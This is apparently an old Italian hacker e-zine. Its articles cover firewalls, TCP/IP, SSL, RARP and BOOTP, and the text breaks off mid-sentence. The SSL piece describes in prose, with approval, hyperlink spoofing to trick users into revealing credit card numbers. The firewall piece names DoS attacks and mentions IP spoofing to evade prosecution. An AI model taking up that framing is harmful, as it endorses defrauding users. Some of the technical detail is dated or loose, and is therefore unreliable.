²°°°°°°°°°°°ÛÛ°°°°°°°ÛÛ°°°°°°°ÛÛ°°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛ°°°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°°°°°°² ²°°°°°°°°°°°ÛÛ°°°°°°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛ°°ÛÛ°°°ÛÛ°°ÛÛ°°°ÛÛ°°°°°°ÛÛ°°°°°°°°°°°°°°² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ Comicio subito col dire che alcuni newbies ultimamente mi hanno fatto qualke domanda su cose specifiche e quando gli passavo qualke doc teorico mi dicevano ...che palle! Be se pensate la stessa cosa allora lasciate perdere l'hacking e datevi all'uncinetto xche se volete bucare uno unix e sapete solo come cancellare i log, se volete avere l'ultima versione di winnuke ma non sapete come funzionano i nuke..be imo siete lamer xche' se non avete le basi non potete fare niente. Soprattutto ricordate che dietro a un hacker c'e' la voglia di conoscenza, il volere capire come funzionano i programmi, non la voglia di distruggere tutto di formattare a destra e a manca e se queste sono le cose che fate di solito... be, mi dispiace ma siete e resterete lamer finche' non vorrete andare al di la' della pappa pronta, finche' non vi verra' la nausea dopo una decina di manuali sulle reti, finche' non avrete capito che differenza c'e' tra i vari protocolli. Finche' non saprete cosa e' un firewall non saprete come sfruttare i suoi bug! Non importa che eta' avete, quanto tempo dedicate ai pc, quanti amici hacker avete, l'unica cosa importante la potete trovare solo dentro di voi, (e forse al 127.0.0.1 vero master? ehehehe) e quella cosa e' la curiosita'. Mah, probabilmente, mi starete pigliando x pazzo, e forse non avete tutti i torti, ma questo e' quello che penso io, e prima di diventare hacker come The Duke passeranno anni (se mai arrivero'a i suoi livelli), xche' come diceva qualcuno che non mi ricordo + chi era... "+ impari e + ti accorgi che da imparare ce n'e' sempre di +". Se dopo questa breve intro credete di avere perso del tempo, be, scusatemi. N0bodY88 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ FIREWALL E PROTOCOLLI INTERNET ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ FIREWALL E PROTOCOLLI INTERNET (1¦ parte) Che cosa e' un firewall? Un firewall puo' essere paragonato ad una centralinista che sia incaricata di filtrare le telefonate secondo determinati criteri, inoltrando od esternando quelle "legittime" e respingendo le altre. Allo stesso modo un firewall (software o hardware) si incarica di filtrare i pacchetti che entrano od escono da un PC, impedendo cosi' situazioni potenzialmente pericolose per il sistema. Esistono varie possibilita' per attaccare un sistema, possiamo riassumerle in due categorie. Network Attack Sono generalmente portati attraverso una modifica del proprio IP (spoofing) per evitare conseguenze anche penali e si suddividono in HACK e DoS attack, rientrano in questa categoria Nuke, Boink, Bonk, Teardrop (tutti i tipi), Click, Flood (tutti i tipi), Puke, Nestea ecc. Questo genere di attacchi non crea danni permanenti in un sistema ma sono ugualmente fastidiosi visto che tendono a bloccare (crash) il PC rendendo necessario un riavvio (reboot) oppure a rallentarne l'operativita' di rete. VPN (Virtual Private Network) Attack Gli attacchi di questa categoria vengono usati per intromettersi in un sistema aggirando password ed username (BRUTE FORCE) oppure approfittando di vulnerabilita' del sistema (CONDIVISIONI, PROXY, WINGATE) oppure avvalendosi di remote server (BACKDOOR) preventivamente installati, per inserire programmi distruttivi (VIRUS), per intercettare informazioni in uscita dal PC (EAVESDROPPER), per monitorare gli orari abituali di connessione (TIMING) ed eventualmente estrapolare dal flusso di dati di una determinata ora, informazioni interessanti (TRAFFIC ANALYSIS). Quindi l'utilita' di avere un firewall e' indubbia ma per alcuni risulta molto difficile effettuare dei settaggi (RULESET) adeguati alle proprie esigenze, di conseguenza rinunciano al firewall oppure si affidano a rulesets preconfezionati che pero' possono essere troppo permissivi (creando problemi di sicurezza) od al contrario troppo restrittivi (impedendo l'accesso a pacchetti di dati importanti). Cerchero' dunque di spiegare le varie parti di un ruleset e di come devono essere impostate per ottenere determinati risultati dando uno sguardo anche a come un pacchetto di dati viene instradato e ricevuto ed a quali sono ed a che servono i vari protocolli di comunicazione presenti nella rete dando anche una sommaria descrizione degli stessi. I protocolli di comunicazione in Internet Uno degli scopi di ARPANET (l'antenata di Internet) era lo sviluppo di uno strumento che permettesse a computers aventi diverso hardware e diversi sistemi operativi di comunicare. Questo fu realizzato attraverso la creazione di un insieme di protocolli, cioe' di un insieme di regole e di convenzioni che tutti i computer su Internet dovevano seguire per poter comunicare. I protocolli di comunicazione usano un sistema a stack, per cui un pacchetto quando viene instradato, deve scendere i vari livelli dello stack del sistema mittente, attraversare la rete e risalire i vari livelli dello stack del sistema destinatario. Ogni livello di stack del sistema mittente, aggiunge un' intestazione (HEADER) e a volte una coda (TRAILER), alla serie dei dati che il pacchetto contiene. Nel sistema destinatario, le intestazioni ed le code, vengono tolte, in modo da rendere disponibili solo i dati originari del pacchetto. Ogni livello dello stack usa un protocollo unico che permette al relativo livello del sistema destinatari o di capire come elaborare ogni pacchetto. I pacchetti sono distribuiti attraverso la rete con una serie di hops (collegamenti) che formano una catena tra il sistema mittente e quello destinatario. I routers della rete hanno tabelle di percorso che consentono di conoscere quale deve essere il prossimo hop da raggiungere per arrivare all'indirizzo del sistema destinatario. Un router e' un dispositivo di comunicazione che interconnette due o piu' reti e che direziona i pacchetti ai sistemi di destinazione. Indirizzo IP (INTERNET PROTOCOL) I numeri IP sono formati da un unico numero di 32bit,formato da quattro campi di 8bit l'uno separati da un punto (###.###.###.###), ognuno di questi campi puo' contenere quindi un numero compreso tra 0 e 255, tuttavia essendo i numeri 0 e 255 riservati, si puo' avere un numero compreso tra 1 e 254. Il primo campo contraddistingue la parte pubblica dell'indirizzo e viene assegnato all'ISP (Internet Service Provider) dietro registrazione all'InterNIC (Internet Network Information Center) e contrassegna anche la classe del network (A= 1-126, B=128-191, C=192-254, 127 e' riservato) mentre i restanti tre campi sono ad uso interno dell'ISP. Quindi risulta subito evidente che possiamo avere una prima protezione consentendo solo a pacchetti di dati che provengono da determinati IP, l'accesso al nostro sistema. Il problema nasce quando non possiamo sapere preventivamente da quali IP potremmo ricevere pacchetti importanti, come di solito succede con la navigazione (anche se usando un proxy basta inserire il suo IP e settare la porta di connessione, solitamente 8080, per risolvere il problema), le chats, amici con IP dinamico ecc. Per ovviare a questo genere di problemi si puo' agire impostando la NETWORK MASK. Network Mask I netmasks, permettono di ordinare i pacchetti di dati destinati ai subnetworks. La mask avra' lo stesso formato 32-bit dell'IP NUMBER (cioe' ###.###.###.###), ed informa il sistema quali bits dell'IP ADDRESS sono il network number e l'host number. Soltanto i bits nella parte riservata dell'IP ADDRESS possono essere usati per indicare gli hosts. Se un bit e' acceso (1), il bit corrispondente dell'IP ADDRESS viene considerato parte dell' indirizzo di subnetwork o della rete. Se un bit e' spento (0), il bit corrispondente dell'ip address viene considerato parte dell'host address. Il primo campo e' sempre 255 (11111111) ed il quarto campo e' solitamente 0 (00000000). Per esempio, 255,255,255,0 puo' essere una rete di classe C, con i campi 1, 2 e 3 che definiscono il network number ed il campo 4 che definisce l'host number. La maggior parte dei campi hanno solitamente un valore di 255 o di 0, anche se altri valori che hanno tutti1 a sinistra e tutti 0 a destra sono accettabili. Le alternative possibili a 255 in un dato campo devono avere tutti 1 nei bits high-end e tutti 0 nei bits low-end: 254, 11111110; 252, 11111100; 248, 11111000; 240, 11110000; 224, 11100000; 192, 11000000; 128, 10000000. I netmasks permettono di filtrare dei pacchetti che appartengono in maniera specifica ad un dato subnetwork. Per esempio, 212.12.63.1 con il netmask settato a 255,255,255,0 permette che tutti i dati provenienti dal network 212,12,63 accedano al sistema. IL protocollo TCP/IP Il TCP e' un protocollo di livello trasporto. Benche' sia stato introdotto come parte del TCP/IP, e' di uso generale; infatti e' stato preso come base per il protocollo TP-4, proposto come protocollo OSI dall'ISO. I pacchetti che attraversano la rete, devono passare attraverso i layers tcp e ip. Il layer dell'ip e' predisposto a fissare la destinazione dei pacchetti ma non e' in grado di verificare che gli stessi arrivino effettivamente a destinazione, a questo ci pensa il layer tcp effettuando timeouts, retransmissions, acknowledgments e confirmation relativi al pacchetto, interagendo con il layer ip. Questi formano insieme la suite del protocollo TCP/IP (combinazione) che permette ai pacchetti di passare attraverso la rete in modo affidabile. Poiche' il TCP non ha particolari assunzioni per quanto riguarda la rete sottostante, funziona su molte reti diverse: collegamenti telefonici commutati, reti locali, reti ad alta velocita' in fibra ottica, collegamenti punto-punto a bassa velocita' su lunghe distanze, ecc. Il TCP si occupa anche di definire le procedure per assicurare la correttezza dei dati, di specificare il modo in cui due computer iniziano la trasmissione della sequenza di bit e come questi si accordano sulla fine della trasmissione, di implementare un meccanismo per distinguere destinazioni multiple all'interno di una stessa macchina, di implementare meccanismi per gestire la perdita e la duplicazione dei pacchetti. Andiamo a vedere adesso quali sono le proprieta' di questo protocollo: 1. Stream Orientation Quando due processi in due macchine si trasmettono i dati, e' possibile pensare ad una sequenza (stream) di bit, uno di seguito all'altro, divisi in gruppi di 8 bit. Il TCP consegna alla destinazione la stessa sequenza di bit trasmessa dal mittente. 2. Circuito virtuale Trasferire i dati in sequenza e' come fare una telefonata. Concettualmente, una macchina effettua una chiamata all'altra macchina, la quale la deve accettare. Il software che implementa il TCP verifica che la comunicazione sia permessa e che entrambe le parti siano pronte, poi informa l'applicazione sovrastante dell'avvenuta connessione. Durante la comunicazione le macchine continuano a scambiarsi informazioni per controllare il corretto svolgimento della trasmissione. Se, per qualche motivo, la comunicazione si interrompe, entrambe le macchine segnalano la situazione alle relative applicazioni. Questo modo di operare si indica col termine circuito virtuale, perche' le macchine hanno l'illusione di avere una connessione harware diretta tra esse. 3. Buffered Transfer L'applicazione invia i dati da inviare al software sottostante. Ciascuna applicazione suddivide la sequenza dei bit in modo arbitrario, anche byte per byte. In genere, per rendere piu' efficiente la trasmissione e per minimizzare il traffico sulla rete, il TCP memorizza i dati da inviare fino a quando non ha da trsmettere un datagramma di dimensioni ragionevoli. Analogamente, se l'applicazione richiede l'invio di un blocco troppo grande, il TCP si incarica di suddividerlo. In quelle applicazioni in cui un dato deve essere trasferito subito, anche se non riempie il buffer (es. telnet), esiste un meccanismo di push che forza la trasmissione. Anche in ricezione il push forza il TCP a passare il dato immediatamente all'applicazione sovrastante. 4. Sequenza non strutturata La sequenza di bit trasferita dal TCP non e' strutturata, nel senso che in tale sequenza non e' possibile a questo livello distinguere le strutture dati presenti (p.es. non e' possibile individuare i record o i campi all'interno dei record). Questa interpretazione dei dati deve essere fatta a livello superiore. 5. Connessione Full Duplex La connessione fornita dal TCP permette la trasmissione contemporanea nei due sensi, detta, appunto, full duplex. In sostanza, e' possibile che tra due applicazioni vengano scambiati dati nei due sensi contemporaneamente, senza apparente interazione tra un flusso e un altro. Il TCP utilizza il metodo piggy backing per inserire le informazioni di controllo della trasmissione in una direzione nei dati diretti nell'altro senso. Il protocollo TCP fornisce l'affidabilita' mediante l'utilizzo di un'appropriata tecnica ARQ (Automatic Repeat reQuest). Il probelma della duplicazione dei pacchetti viene risolto numerando i pacchetti in trasmissione e inviando tali numeri in acknowledgement. Sopra il TCP/IP, vi sono i protocolli applicativi come HTTP (HyperText Transport Protocol) per il World Wide Web, NNTP (Network News Transport Protocol) per UseNet e SMTP (Simple Mail Transport Protocol) per la posta elettronica. The Duke - Fine della 1¦ parte ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ SSL ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ SSL Sappiamo che nel Web si utilizza il protocollo HTTP per comunicare tra server e browser. Ma uno dei difetti maggiori del protocollo HTTP e' la assoluta mancanza di sicurezza nella trasmissione. Ecco allora che si pone il problema di come rendere sicuro questo protocollo, in particolare quando, tramite HTTP, dobbiamo inviare dati che in nessun modo devono cadere in mano altrui, come ad es. dati personali o numeri di carte di credito (eheheh...e qua drizzate le orecchie :-)) ). Ecco che la maggior parte dei server Web hanno preferito adottare un protocollo sicuro, chiamato SSL, ovvero Secure Socket Layer, sviluppato da Netscape col preciso scopo di fornire delle trasmissioni sicure. Esaminiamo le caratteristiche di questo protocollo: 1) E' un protocollo aperto e non-proprietario 2) Fornisce funzioni di crittografia dei dati, autenticazione del server e addirittura autenticazione del client. 3) E' compatibile con i firewall 4) E' compatibile con le connessioni a tunnel (le connessioni telefoniche che consentono tramite Internet di accedere alle WAN e alle Intranet) 5) Trasmette i dati utilizzando le estenzioni S-MIME (Secure-Multipurpose Internet Mail Extensions) Il fatto che SSL sia un protocollo aperto e non-proprietario si traduce nel fatto che Netscape ha reso l'intero protocollo disponibile sia per le aziende che per i privati che dovessero impiegarlo nello sviluppo di applicazioni Internet. Il protocollo SSL consente ai server ed agli utenti di crittografare e proteggere le trasmissioni durante le transazioni Web e altre transazioni Internet. Esso richiede che alla connessione partecipino un browser ed un server SSL. Ma vediamo piu' nello specifico come SSL puo' rendere sicure le trasazioni. Esso da' sostanzialmente tre servizi: 1) Autenticazione del server tramite certificati digitali 2) Sicurezza delle trasmissioni tramite crittografia 3) Integrita' dei dati nelle connessioni Nello stack dei protocolli TCP/IP, il livello SSL si trova sotto il livello delle applicazioni (HTTP, SMTP, TElnet, FTP, Gopher e NMTP) e sopra il livello di trasporto (che contiene il modulo TCP) e il livello di rete (che contiene il modulo del protocollo IP). Il posizionamento di SSL sotto i protocolli del livello delle applicazioni e sopra il protocollo di comunicazione TCP/IP gli consente di sfruttare gli standard esistenti per le comunicazioni via Internet, senza limitare SSL a un determinato protocollo di applicazioni. Quando un browser SSL si connette ad un server SSL, le due parti possono scambiare comunicazioni criptate. In questo modo si aumenta per entrambi la sicurezza che le comunicazioni arrivino a destinazione senza essere lette o modificate. L'autenticazione di server SSL utilizza la crittografia a chiave pubblica RSA, insieme a certificati come il Verisign, in modo che quando ci si connette ad un server, e' possibile visualizzarne il certificato per controllare se in effetti ci si e' connessi al server desiderato. Quando un browser ed un server stabiliscono una comunicazione sicura, il server invia al browser una chiave di sessione che entrambi useranno per crittografare le connessioni. Per proteggere questa chiave di sessione, SSL utilizza un sistema a crittografia pubblica. In pratica quando un browser tenta di connettersi con un server sicuro, invia al server un messaggio Client.Hello che ha lo stesso significato di una connessione HTTP. Inoltre il browser invia al server la propria chiave pubblica che viene generata durante l'installazione del browser sul computer. Dopo che il server riceve il messaggio Client.Hello, valuta le informazioni contenute nel messaggio. Se il browser supporta un tipo di crittografia supportata anche dal server, e se gli altri protocolli SSL corrispondono a qualli del browser, il server rispondera' con Server.Hello. La risposta del server sara' crittografata con la chiave pubblica del client, e la risposta del server conterra' anche la chiave pubblica del server. Dopo che il client riceve la risposta Server.Hello, invia al server un'altra richiesta. Il client codifica questa seconda richiesta con la chiave pubblica del server, dal momento che e' l'unica che conosce. Oltre alle informazioni relative all'handshake, la seconda richiesta del client chiede al server di inviare al client la chiave di sessione che le parti da ora in poi useranno per le comunicazioni. Quindi il server invia la chiave di sessione codificata utilizzando la chiave pubblica del client. Dopo che il client riceve la chiave di sessione crittografata, procedera' con le richieste successive. La crittografia RSA e' molto sicura, basti pensare che per "rompere" un messaggio crittografato a 128 bit un computer da 225 MIPS ci impegherebbe un anno. Si puo' sapere se un documento proviene da un server sicuro osservando l'URL. Se l'URL inizia con https il documento proviene da un server sicuro. Per connettersi a un server HTTP che fprnisce funzionalita' di sicurezza utilizzando il protocollo SSL bastera' aggiungere la "s". Da quanto detto finora sembrerebbe proprio che SSL sia una bestia nera per ogni hacker, ma in realta' non e' cosi' :-))) Infatti, tramite un attacco noto come Hyperlink spoofing, l'hacker puo' intromettersi nella comunicazione tra il server ed il client e convincere l'utente a rivelare informazioni come ad es. il numero della propria carta di credito o altre informazioni riservate. Un alto rischio di Hyperlink Spoofing sta negli applet java, che magari si eseguono tranquillamente perche' si ritiene provengano da server sicuri, ma in realta' non e' cosi'. Si noti che tutti gli attacchi di Hyperlink Spoofing si basano su un difetto nel modo in cui i browser impiegano i certificati digitali per rendere sicure le sessioni. Infatti questo attacco non colpisce la crittografia a basso livello o il funzionamento del protocollo SSL. Come si e' gia' detto, quando un utente crea una connessione SSL, il browser ed il server impiegano un protocollo che consente di autenticare il server e, opzionalmente, il client. L'attacco Hyperlink Spoofing si concentra sull'autenticazione del server. Durante lo scambio iniziale del protocollo SSL, il server mostra al browser il proprio certificato. Il certificato del server e' una struttura con firma digitale che unisce la chiave pubblica e determinati attributi del server. Attualmente il protocollo SSL impiega nel certificato un nome di DNS. Trasportando correttamente il protocollo e presentando un certificato valido di cui il client si puo' fidare, il server dimostra al browser di essere in possesso della chiave privata corrispondente. Il browser dunque crede che il server ha il diritto di utilizzare il nome DNS che sostiene di avere, e qua cominciano i guai ^_^ L'attacco Hyperlink Spoofing ha successo perche' la maggior parte degli utenti non chiede di connettersi a URL o a nomi DNS specifici, ma segue collegamenti ipertestuali. Ma il protocollo SSL verifica solo la porzione dell'indirizzo URL relativa al server, e non il link selezionato dall'utente. Ecco che se si riesce a condurre il browser su un indirizzo errato, l'utente potrebbe essere ancora convinto di essere su una connessione protetta, ma in realta' non e' cosi'. Mi si potrebbe obiettare che, ogni volta che si accede a una pagina protetta, una finestra del Navigator o dell'Explorer ci avvisa di essere su una pagina protetta, ma per esperienza so che la maggior parte preferisce cekkare il "Never display this message again" pur di evitare il pop-un continuo della finestra. Infine, se una connessione ed un documento sono sicuri, il fatto di sapere di aver richiesto un documento sicuro non aggiunge particolari informazioni e verificare la connessione del server diventa inutile. Ecco allora che, una volta reindirizzato il browser, si potra' richiedere qualsiasi tipo di informazione all'utente il quale, confortato dalla sicurezza della trasmissione, non esitera' a dare. Sicuramente l'attacco di Hyperlink Spoofing non risultera' dei piu' semplici, ma del resto il risultato a cui porta vale la pena ;-))) Ora vi saluto e......GoOd HaCkInG Brigante ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ INTRODUZIONE AL RARP ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ INTRODUZIONE AL RARP In genere, al momento del collegamento con una rete TPC/IP, un sistema deve conoscere tutta una serie di informazioni, di cui la piu' importante e' sicuramente l' indirizzo IP, altrimenti non sara' in grado di interagire correttamente con gli altri computer. In realta', non tutti i sistemi collegati in rete possiedono queste informazioni fin dall' inizio. Per esempio, esistono periferiche che non hanno una propria memoria di massa su cui immagazzinare i dati, come i "network computer" oppure i terminali. Queste macchine, che dipendono da altre macchine per la memorizzazione di dati e informazioni , spesso, non hanno neanche un vero e proprio sistema operativo, ma lo devono caricare direttamente dalla rete al momento della accensione. Ma come funziona una macchina priva di sistema operativo e di memoria di massa a collegarsi a una rete internet? In genere queste macchine possiedono un piccolo programma di attivazione memorizzato su una ROM programmabile, in grado di ottenere dalla rete stessa le informazioni che servono al collegameto e quindi di scaricare da un server remoto un pezzo di sistema operativo o comunque un' applicazione client in grado di farlo operare in rete. Allora, ci si potrebbe chiedere, perche' non memorizzare direttamente nella PROM le informazioni che servono al sistema per il collegamento? I motivi sono due. Il primo e' che dati di questo tipo sono disponibili solo nel momento in cui si decide dove "collocare" il computer. Solo allora l' amministratore della rete decidera' quali sono le informazioni che quel determinato sistema deve conoscere. Un programma generico, che permette di ottenere tali informazioni in modo dinamico puo' essere invece memorizzato nella PROM direttamente in fabbrica, quando la macchina viene assemblata, con evidente risparmio di tempo e denaro. Il secondo motivo e' che una macchina puo' venire spostata da una rete fisica ad un' altra, oppure l' amministratore dela rete puo' avere la necessita' di riorganizzare tutto lo spazio di indirizzamento della stessa o modificarne i parametri. RARP Il protocollo RARP (Reverse Address Resolution Protocol) si basa su due considerazioni. La prima e' che, in effetti, un computer sa' come comunicare in rete, sa' cioe' spedire e ricevere bit utilizzando i protocolli della rete fisica a cui e' collegato, e sa' come identificarsi in modo univoco, dato che possiede un indirizzo fisico di rete, generalmente corrispondente all' identificativo della scheda di communicazione utilizzata. La seconda e' che anche se un sistema non conosce l' indirizzo di rete di un altro sistema con cui desidera comunicare, puo' sempre mandare un messaggio a tutti i sistemi collegati localmente utilizzando la tecnica del "Broadcasting". Non appena il computer viene acceso, il programma memorizzato nella PROM viene mandato in esecuzione. Per prima cosa ricavera' della scheda di rete l'indirizzo fisico del sistema. Questo identificativo e' memorizzato nella scheda e, non dipendendo dal tipo o dal modello di computer utilizzato, sara' sicuramente univoco. Questi identificativi sono costruiti un po' come i numeri telefonici o gli indirizzi IP. Ogni marca registra un proprio insieme, all'interno del quale si assicura che indipendentemente dal modello, tutte le schede abbiano un indirizzo differente. A questo punto il programma spedisce a tutte le macchine gia' collegate in rete un messaggio in cui fornisce il proprio indirizzo fisico e chiede che gli venga mandato in dietro quello IP. Perche' cio' avvenga e' necessatio che nella rete fisica esista almeno un server RARP in grado di soddisfare la richiesta. Esistono due differenti schemi che permettono a un server di ricavare l' indirizzo IP a fronte di quello fisico: o il server possiede una tabella di conversione che fornisce gli indirizzi IP di un certo numero di macchine a partire da quelli fisici, oppure esiste una formula di conversione capace di convertire l' indirizzo richiesto direttamente da quello fornito. Nella rete puo' esserci anche piu' di un server RARP, anche perche' se fosse l' unico e dovesse cadere, nessun computer potrebbe piu' ottenere il suo indirizzo IP all' accensione. Per evitare che il client venga bombardato dalle risposte di tutti i server RARP presenti in rete, per ogni client viene assegnato un server primario. Tutti gli altri saranno quindi secondari. Quando parte la richiesta, solo il server primario risponde subito, gli altri la ignorano. Puo' tuttavia succedere che il messaggio si perda o arrivi danneggiato, oppure che il primario non funzioni o che sia sovracarico. In tal caso il client rimanda la sua richiesta dopo un certo periodo di tempo. Nel momento in cui arriva la seconda richiesta, ogni secondario in grado di risolvere l' indirizzo fisico fornito, spedira' indietro l' indirizzo IP corrispondente. In ogni caso il client utilizzera' la prima risposta che arriva, ache se non ignorera' le altre, ma le utilizzera' come controprova per maggior sicurezza. A questo punto, ricevuto l' indirizzo IP, il programma di accensione potra' comunicare in rete e ricevere dallo stesso o da un' altro server tutte le informazioni che necessita, incluso l 'indirizzo da cui scaricarsi il sistema operativo o l' applicativo client che gli permettera' di operare correttamente. Questo tuttavia avvera' attraverso altri protocolli, come TFTP. In realta' il protocollo RARP non serve solo a ottenere il proprio indirizzo IP, ma permette a qualunque sistema si chiedere a un server RARP l' indirizzo IP che corrisponde a un certo indirizzo fisico. In tal caso, il primo sistema sara' detto richiedente "sender", il secondo destinatario "target". La struttura del messaggio RARP e': 0 8 16 24 31 ^ ^ ^ ^ ^ a b c d e a --> |Tipo dell' interfaccia fisico | b --> |Tipo di protocollo | c --> |Lunghezza indirizzo fisico | d --> |Lunghezza indirizzo IP | e --> |Tipo di messaggio | Indirizzo fisico del richiedente (otteti 0-3) indirizzo fisico del richiedente (otteti 4-5) | Il primo campo contiene il tipo d' interfaccia fisica a cui il sistema e' collegato. Per esempio, per una rete Ethernet il tipo e' 0x0001. Questo in quanto RARP opera a basso livello, incapsulando la struttura che stiamo analizzando direttamente in un frame fisico. Il secondo campo contiene l'identificativo del protocollo di cui si vuole avere l' indirizzo. Nel caso di IP e' 0x0800. RARP potrebbe infatti essere utilizzato per ricavare altri tipi di indirizzi e lo stesso tipo di struttura e' utilizzato anche dal protocollo ARP, che serve a ottenere l' indirizzo fisico a partire da quello di un protocollo di piu' alto livello. I sucessivi due campi danno rispettivamente la lunghezza dell' indirizzo fisico e quella dell' indirizzo del protocollo di alto livello, nel nostro caso dell' IP. Il quinto campo contiene il tipo di messaggio trasmesso. Ce ne sono 4 tipi, e cioe' una richiesta d' informazione e una risposta contenente i dati richiesti per ognuno dei due protocolli che usano questa struttura: ARP e RARP. I campi successivi contengono gli indirizzi fisici e IP sai del richiedente sia del destinatario. Ovviamente, a seconda che il messaggio sia una richiesta o una risposta, alcuni campi saranno riempiti mentre altri conterranno tutti zero. Fine Darkman ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ BOOTP ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ BOOTP Il protocollo che abbiamo appena preso in esame presenta alcuni svantaggi. Innanzitutto il programma di accensione deve essere in grado di operare a livello di rete fisica. Questo vuol dire che la stessa macchina non puo' essere collegata a reti fisiche differenti. Per esempio, se la PROM e' stata prorgammata per operare su una rete Ethernet, essa non potra' essere utilizzata su una token ring, e viceversa. In questo secondo luogo, RARP permette di ottenere solo l' indirizzo IP corrispondente all' indirizzo fisico fornito. Per operare in rete e' spesso necessario avere molte altre informazioni, come per esempio l' indirizzo IP del router oppure la subnet mask. Per ovviare e' stato sviluppato un altro protocollo che si appoggia sull' UPD e che quindi e' indipendente dalla rete fisica. UPD utilizza gli indirizzi IP, proprio come il suo fratello maggiore TCP. Questo protocollo si chiama BOOTP (bootstrap protocol), e risolve molti problemi caratteristici del RARP. Non solo: un server BOOTP puo' trovarsi su una rete fisica differente da quella del richiedente o del destinatario. IL protocollo BOOTP utilizza due porte riservate UPD, e cioe' la 68 per la client e la 67 per il server. Ma come funziona una macchina che non conosce il proprio indirizzo IP a utilizzare un protocollo basato proprio sull' IP? La tecnica e' analoga a quella gia' utilizzata dal RARP. In pratica, il messaggio viene mandato a tutti, via limited broadcasting. Fino al momento in la distribuzione avviene nella rete fisica locale, l'IP e' in grado di recapitare un messaggio che specifica come destinatario l' indirizzo riservato 255.255.255.255 senza per questo dover conoscere per forza l' indirizzo del mittente o anche solo l' indirizzo del dominio locale. Ma a chi risponde il server BOOTP? Si potrebbe pensare che, visto che conosce l' indirizzo IP del richiedente, potrebbe rispondere direttamente a quello. In realta' chi spedisce la richiesta non conosce ancora il proprio indirizzo IPe quindi non riconoscerebbe come indirizzata a se' la risposta. Esistono diverse soluzioni. La piu' semplice, comunque, e' che anche il server utilizzi una tecnica di broadcasting. Uno specifico campo nella risposta conterra' un identificativo che permettera' al richiedente di associare la sua richiesta con una delle tante risposte immesse nella rete dai vari server. Il protocollo, inoltre, impone che il pacchetto spedito non possa mai essere frammentato. Il meccanismo utilizzato dal BOOTP segue quindi piu' o meno la stessa traccia vista per il RARP, con la differenza che l' indirizzo fisico non e' coinvolto direttamente e quindi il collegamento puo' avvenire senza bisogno che il programma di accensione sappia operare a livello di rete fisica. Anche nel caso del BOOTP esiste un' architettura basata su server primari e secondari e sulla ritrasmissione della richiesta in caso di perdita di dati o caduta del server primario. Per evitare che un server BOOTP sia bombardato da un numero ingestibile di richieste in caso di caduta e ripristino di tutta la rete locale, ogni client utilizzera' un ritardo casuale da 0 a 4 secondi prima di ritrasmettere la propria richiesta. Questo intervallo di tempo sara' raddoppiato nel caso di una 